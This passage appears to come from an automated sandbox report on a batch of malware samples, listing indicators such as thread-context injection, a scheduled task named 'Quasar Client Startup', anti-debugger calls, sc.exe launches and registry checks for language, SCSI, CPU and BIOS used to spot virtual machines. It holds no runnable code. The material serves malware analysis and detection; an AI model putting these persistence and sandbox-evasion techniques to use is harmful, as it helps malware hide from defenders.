File created C:\Windows\system32\perfc011.dat WMIADAP.EXE File opened for modification C:\Windows\system32\MRT.exe gem2.exe File opened for modification C:\Windows\system32\MRT.exe gem2.exe File opened for modification C:\Windows\system32\MRT.exe gem2.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\Quasar Client Startup svchost.exe File opened for modification C:\Windows\System32\Tasks\RuntimeBroker svchost.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\a7 RuntimeBroker.exe File created C:\Windows\system32\perfh009.dat WMIADAP.EXE File created C:\Windows\system32\perfc010.dat WMIADAP.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 5444 wudi.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 4752 set thread context of 1952 4752 gem1.exe 127 PID 4944 set thread context of 4884 4944 gem2.exe 153 PID 5156 set thread context of 5980 5156 Lightshot.exe 187 PID 5156 set thread context of 6060 5156 Lightshot.exe 190 PID 5156 set thread context of 1780 5156 Lightshot.exe 192 PID 5904 set thread context of 4696 5904 gem2.exe 229 PID 4380 set thread context of 5924 4380 Lightshot.exe 258 PID 4500 set thread context of 5896 4500 gem1.exe 291 PID 5252 set thread context of 1992 5252 gem2.exe 323 PID 3064 set thread context of 5560 3064 Lightshot.exe 351 PID 1876 set thread context of 5776 1876 drop1.exe 459 PID 3052 set thread context of 5348 3052 drop2.exe 484 PID 3052 set thread context of 2676 3052 drop2.exe 543 PID 4452 set thread context of 1820 4452 powershell.EXE 510 PID 5348 set thread context of 5760 5348 svchost.exe 512 -
resource yara_rule behavioral2/files/0x002f00000004612c-3145.dat upx behavioral2/memory/5080-3150-0x00007FF79D990000-0x00007FF79D9A7000-memory.dmp upx behavioral2/memory/5080-3168-0x00007FF79D990000-0x00007FF79D9A7000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe drop2.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.ini WMIADAP.EXE File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File created C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File created C:\Windows\inf\WmiApRpl\WmiApRpl.ini WMIADAP.EXE File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp chrome.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4372 sc.exe 4888 sc.exe 3976 sc.exe 5448 sc.exe 5640 sc.exe 4932 sc.exe 2852 sc.exe 2968 sc.exe 1116 sc.exe 1088 sc.exe 3704 sc.exe 1108 sc.exe 5164 sc.exe 4196 sc.exe 5792 sc.exe 2284 sc.exe 1136 sc.exe 4000 sc.exe 5580 sc.exe 5316 sc.exe 968 sc.exe 2892 sc.exe 3728 sc.exe 2676 sc.exe 2640 sc.exe 3420 sc.exe 3084 sc.exe 3000 sc.exe 4944 sc.exe 2024 sc.exe 3196 sc.exe 4992 sc.exe 5348 sc.exe 324 sc.exe 1664 sc.exe 912 sc.exe 5216 sc.exe 5584 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 1716 4752 WerFault.exe 122 4088 4500 WerFault.exe 289 5776 568 WerFault.exe 440 5004 568 WerFault.exe 440 5996 2256 WerFault.exe 452 4828 4704 WerFault.exe 460 3796 3152 WerFault.exe 470 3348 5756 WerFault.exe 471 484 4308 WerFault.exe 584 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language drop1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wudi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Fixer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language benpolatalemdar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client-built.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fixer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClientGK.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language drop1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2021.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sela.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language albt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_Windows_8.2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_Windows_XP.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Steanings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client-built.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crawl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_Windows_XP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2023.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2022.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language prueba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_Windows.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTallowedtocrypt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 02.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evetbeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2023.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language testingg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gem1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor.tmp -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5708 PING.EXE 3092 cmd.exe 5156 PING.EXE 4028 PING.EXE 1936 PING.EXE -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0028000000046425-5220.dat nsis_installer_1 behavioral2/files/0x0028000000046425-5220.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters dwm.exe -
Checks processor information in registry 2 TTPs 27 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 44 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS drop2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer drop2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried 